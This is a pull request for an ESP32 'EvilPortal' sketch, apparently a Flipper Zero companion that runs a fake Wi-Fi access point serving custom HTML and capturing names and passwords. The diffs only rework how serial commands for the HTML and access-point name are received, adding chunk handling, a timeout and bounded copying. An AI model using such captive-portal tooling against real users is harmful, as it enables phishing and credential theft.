### PR TITLE
Improve ESP32 command reception logic

### DIFF
--- a/esp32/EvilPortal/EvilPortal.ino
+++ b/esp32/EvilPortal/EvilPortal.ino
@@ -131,8 +131,12 @@ void getInitInput() {
   bool has_ap = false;
   bool has_html = false;
   String flipperMessage;
+  unsigned long last_reception = 0;
+
   while (!has_html || !has_ap) {
       if (Serial.available() > 0) {
+        // Save the current reception timestamp.
+        last_reception = millis();
         flipperMessage += Serial.readString();
         // Check if we have received the terminator character.
         if (!flipperMessage.endsWith("\n")) {
@@ -167,6 +171,10 @@ void getInitInput() {
 
         // Clear the string after processing the command.
         flipperMessage.clear();
+      } else if (flipperMessage.length() > 0 && millis() - last_reception > 100) {
+        // If we have a dangling command for more than 100ms, clear flipperMessage.
+        flipperMessage.clear();
+        Serial.println("reception timed out");
       }
   }
   Serial.println("all set");

--- a/esp32/EvilPortal/EvilPortal.ino
+++ b/esp32/EvilPortal/EvilPortal.ino
@@ -3,8 +3,6 @@
 #include <DNSServer.h>
 #include <WiFi.h>
 
-#define MAX_HTML_SIZE 20000
-
 #define B_PIN 4
 #define G_PIN 5
 #define R_PIN 6
@@ -30,8 +28,10 @@ String password;
 bool name_received = false;
 bool password_received = false;
 
-char apName[30] = "";
-char index_html[MAX_HTML_SIZE] = "TEST";
+// Ap name length can be maximum 32, make the buffer 33 to include the
+// null terminator character.
+char apName[33] = "";
+String index_html;
 
 // RESET
 void (*resetFunction)(void) = 0;
@@ -45,7 +45,7 @@ public:
   bool canHandle(AsyncWebServerRequest *request) { return true; }
 
   void handleRequest(AsyncWebServerRequest *request) {
-    request->send_P(200, "text/html", index_html);
+    request->send_P(200, "text/html", index_html.c_str());
   }
 };
 
@@ -67,7 +67,7 @@ void setLed(int i) {
 
 void setupServer() {  
   server.on("/", HTTP_GET, [](AsyncWebServerRequest *request) {
-    request->send_P(200, "text/html", index_html);
+    request->send_P(200, "text/html", index_html.c_str());
     Serial.println("client connected");
   });
 
@@ -130,24 +130,43 @@ void getInitInput() {
   Serial.println("Waiting for HTML");
   bool has_ap = false;
   bool has_html = false;
+  String flipperMessage;
   while (!has_html || !has_ap) {
       if (Serial.available() > 0) {
-        String flipperMessage = Serial.readString();
-        const char *serialMessage = flipperMessage.c_str();
-        if (strncmp(serialMessage, SET_HTML_CMD, strlen(SET_HTML_CMD)) == 0) {
-          serialMessage += strlen(SET_HTML_CMD);
-          strncpy(index_html, serialMessage, strlen(serialMessage) - 1);
+        flipperMessage += Serial.readString();
+        // Check if we have received the terminator character.
+        if (!flipperMessage.endsWith("\n")) {
+            continue;
+        }
+
+        // We received the whole command, remove the terminator character.
+        flipperMessage.remove(flipperMessage.length() - 1);
+
+        if (flipperMessage.indexOf(SET_HTML_CMD) == 0) {
+          index_html = flipperMessage.substring(strlen(SET_HTML_CMD));
           has_html = true;
           Serial.println("html set");
-        } else if (strncmp(serialMessage, SET_AP_CMD, strlen(SET_AP_CMD)) ==
-                   0) {
-          serialMessage += strlen(SET_AP_CMD);
-          strncpy(apName, serialMessage, strlen(serialMessage) - 1);
-          has_ap = true;
-          Serial.println("ap set");
-        } else if (strncmp(serialMessage, RESET_CMD, strlen(RESET_CMD)) == 0) {
+        } else if (flipperMessage.indexOf(SET_AP_CMD) == 0) {
+          size_t cmd_len = strlen(SET_AP_CMD);
+          size_t to_copy_bytes = flipperMessage.length() - cmd_len;
+          if (to_copy_bytes > 0) {
+              if (to_copy_bytes > 32) {
+                  // Truncate AP name longer then 32 characters.
+                  to_copy_bytes = 32;
+              }
+              // Copy the ap name to the apName buffer.
+              const char *ap_name_start = flipperMessage.c_str() + cmd_len;
+              snprintf(apName, sizeof(apName), "%s", ap_name_start);
+
+              has_ap = true;
+              Serial.println("ap set");
+          }
+        } else if (flipperMessage.indexOf(RESET_CMD) == 0) {
           resetFunction();
         }
+
+        // Clear the string after processing the command.
+        flipperMessage.clear();
       }
   }
   Serial.println("all set");

--- a/esp32/EvilPortal/EvilPortal.ino
+++ b/esp32/EvilPortal/EvilPortal.ino
@@ -172,7 +172,7 @@ void getInitInput() {
         // Clear the string after processing the command.
         flipperMessage.clear();
       } else if (flipperMessage.length() > 0 && millis() - last_reception > 100) {
-        // If we have a dangling command for more than 100ms, clear flipperMessage.
+        // If we have a dangling command for more than 100ms clear flipperMessage.
         flipperMessage.clear();
         Serial.println("reception timed out");
       }


### PR DESCRIPTION
Fix: #52

This PR enhances the ESP32 serial command reception logic to handle commands that may be received in multiple parts, particularly addressing the `sethtml` command, which can be long in size and may not be received as a single part. These modifications enable the ESP32 to correctly handle such commands and ensure seamless processing of data received in chunks.

